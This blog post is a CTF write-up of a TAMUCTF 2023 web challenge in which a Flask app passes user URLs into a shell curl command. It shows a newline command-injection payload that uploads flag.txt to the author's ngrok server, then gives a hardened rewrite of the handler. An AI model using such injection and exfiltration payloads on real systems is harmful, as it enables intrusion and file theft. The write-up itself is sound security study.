vicevirus’ Blog

Yo, welcome to my blog! I write tech stuff and play CTFs for fun. (still a noob)

TAMUCTF 2023 Writeup

Introduction

TAMUctf is a CTF organized by the Texas A&M Cybersecurity Center.

I had the chance to participate in it last weekend. The challenges were tough, at least for me.

But I was able to solve one web challenge.

Overall it was a fun and challenging experience.

Note: This writeup was written after the CTF website had been shut down. I’ll be writing about how I worked on the vulnerability on my local machine.

Web Category

Connect
  1. We were given a website where we could curl or test a connection to another website and spit out the HTTP response.
  2. We were also given a zip file which contains the source code of the website.
  3. Now, let’s inspect app.py and see how it operates on the inside. It seems like a normal Flask website serving HTML, CSS and JS, running curl and outputting the result onto the website.
    Image: App.py
  4. But this part of the code seems vulnerable…
  5. What the block of code above does is: when someone sends a POST request to the /api/curl/ endpoint, it runs the curl command directly and returns the HTTP response.
  1. The command ‘curl -s -D - -o /dev/null " + url + " | grep -oP '^HTTP.+[0-9]{3}'’ seems susceptible to command injection. Let’s test it!
  2. Fire up Burp Suite and let’s test the endpoint by first using ‘%0A’ to try to break the command onto a new line and execute our custom commands. For this instance I’ll be using curl google.com as my custom command.
  3. As you can see below, the command curl google.com I put in just now got through to my local environment terminal. Seems like a successful command injection.
    Image: My curl command got through
  4. With the successful command injection, the first thing I did was to set up a reverse shell. But it turns out it didn’t work. I was never able to connect to the vulnerable server.
  5. Next, what I did was set up ngrok, so that the vulnerable server could curl and send a request to my ngrok server with the file contents.
    Image: Ngrok set up
  6. Also, set up a listener on port 4444 to listen for any HTTP requests.
  7. Now we send our own custom curl command: %0Acurl -F "file=@flag.txt" https://b063-113-211-210-189.ngrok-free.app — the -F flag will include the local file in the HTTP request.
    Image: Forcing the vulnerable server to curl to our ngrok server
  8. And we got the flag on the listener!
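The root cause above is that the URL is spliced into a shell command string, so a %0A (newline) lets a second command run. As an added example that is not part of the challenge’s source or this writeup, here is how the /api/curl/ handler could be rebuilt without a shell: the URL becomes a single argv element, the scheme is restricted to http(s), control characters are rejected, and the status line is pulled out with a regex instead of piping through grep. Function names (validate_url, build_curl_argv, status_line, fetch_status) and the --max-time value are my own choices.

```python
import re
import subprocess
from typing import List, Optional
from urllib.parse import urlsplit

# Rebuilt (hypothetical) version of the curl pipeline from the writeup, with no
# shell involved: the URL is one argv element, so a newline or ';' inside it can
# never start a second command. '--' stops curl from reading it as an option.
CURL_PREFIX = ["curl", "-s", "-D", "-", "-o", "/dev/null", "--max-time", "5", "--"]
# Same pattern the original used with grep -oP, applied per line of the header dump.
STATUS_RE = re.compile(r"^HTTP.+[0-9]{3}", re.MULTILINE)


def validate_url(url: str) -> str:
    """Accept only a plain absolute http(s) URL with a host; raise otherwise."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):  # \n, \r, \t, NUL, ...
        raise ValueError("control character in URL")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):  # blocks file://, gopher://, dict://, ...
        raise ValueError("scheme must be http or https")
    if not parts.hostname:
        raise ValueError("URL has no host")
    return url


def build_curl_argv(url: str) -> List[str]:
    """argv list to hand to subprocess.run (never shell=True, never string concat)."""
    return CURL_PREFIX + [validate_url(url)]


def status_line(curl_output: str) -> Optional[str]:
    """Equivalent of `grep -oP '^HTTP.+[0-9]{3}'` on the dumped response headers."""
    match = STATUS_RE.search(curl_output)
    return match.group(0) if match else None


def fetch_status(url: str) -> Optional[str]:
    """What the /api/curl/ handler should do. Note: this still lets a client make
    the server reach internal hosts (SSRF); that needs an allow-list or egress
    controls on top of the injection fix shown here."""
    proc = subprocess.run(build_curl_argv(url), capture_output=True, text=True)
    return status_line(proc.stdout)
```

Calling fetch_status with the writeup’s payload (a URL containing a decoded %0A) now raises ValueError before curl is ever started.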

Thanks for reading my writeup!